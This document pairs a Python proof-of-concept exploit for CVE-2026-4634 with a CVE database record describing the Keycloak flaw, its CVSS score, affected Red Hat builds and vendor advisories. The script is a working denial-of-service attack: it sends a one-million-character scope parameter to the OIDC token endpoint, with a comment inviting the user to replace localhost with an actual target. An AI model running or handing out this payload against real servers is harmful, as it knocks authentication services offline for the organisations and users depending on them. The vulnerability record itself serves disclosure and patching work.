CVE-2026-4634

import requests def exploit_cve_2026_4634(target_url): """ PoC for CVE-2026-4634: Keycloak DoS via long scope parameter. Warning: For educational purposes only. """ # The OIDC token endpoint full_url = f"{target_url}/realms/master/protocol/openid-connect/token" # Craft a malicious scope parameter with excessive length # Adjust the length (e.g., 1000000) as needed to trigger resource exhaustion malicious_scope = "A" * 1000000 payload = { "client_id": "admin-cli", "grant_type": "password", "username": "test", "password": "test", "scope": malicious_scope } headers = { "Content-Type": "application/x-www-form-urlencoded" } try: print(f"Sending payload to {full_url}...") response = requests.post(full_url, data=payload, headers=headers, timeout=10) print(f"Status Code: {response.status_code}") print("Server might be unresponsive if vulnerable.") except requests.exceptions.Timeout: print("Request timed out. Potential DoS condition triggered.") except Exception as e: print(f"An error occurred: {e}") if __name__ == "__main__": target = "http://localhost:8080" # Replace with actual target exploit_cve_2026_4634(target)

{"cve": {"id": "CVE-2026-4634", "sourceIdentifier": "[email protected]", "published": "2026-04-02T13:16:27.027", "lastModified": "2026-04-16T20:50:10.327", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. An unauthenticated attacker can exploit this vulnerability by sending a specially crafted POST request with an excessively long scope parameter to the OpenID Connect (OIDC) token endpoint. This leads to high resource consumption and prolonged processing times, ultimately resulting in a Denial of Service (DoS) for the Keycloak server."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1050"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:-:*:*:*:text-only:*:*:*", "matchCriteriaId": "1830E455-7E11-4264-862D-05971A42D4A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:26.2:*:*:*:text-only:*:*:*", "matchCriteriaId": "C339EBE3-6BFD-4082-B904-4E8DB87AAE68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:26.2.15:*:*:*:text-only:*:*:*", "matchCriteriaId": "3BDF8A92-727E-401B-80BB-A141DCB39750"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:26.4:*:*:*:text-only:*:*:*", "matchCriteriaId": "100AA077-7467-4F62-A8FD-88BC336972DF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:26.4.11:*:*:*:text-only:*:*:*", "matchCriteriaId": "17E79930-BE1C-4901-AF63-36B3EB149AFC"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:6475", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:6476", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:6477", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:6478", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/security/cve/CVE-2026-4634", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450250", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}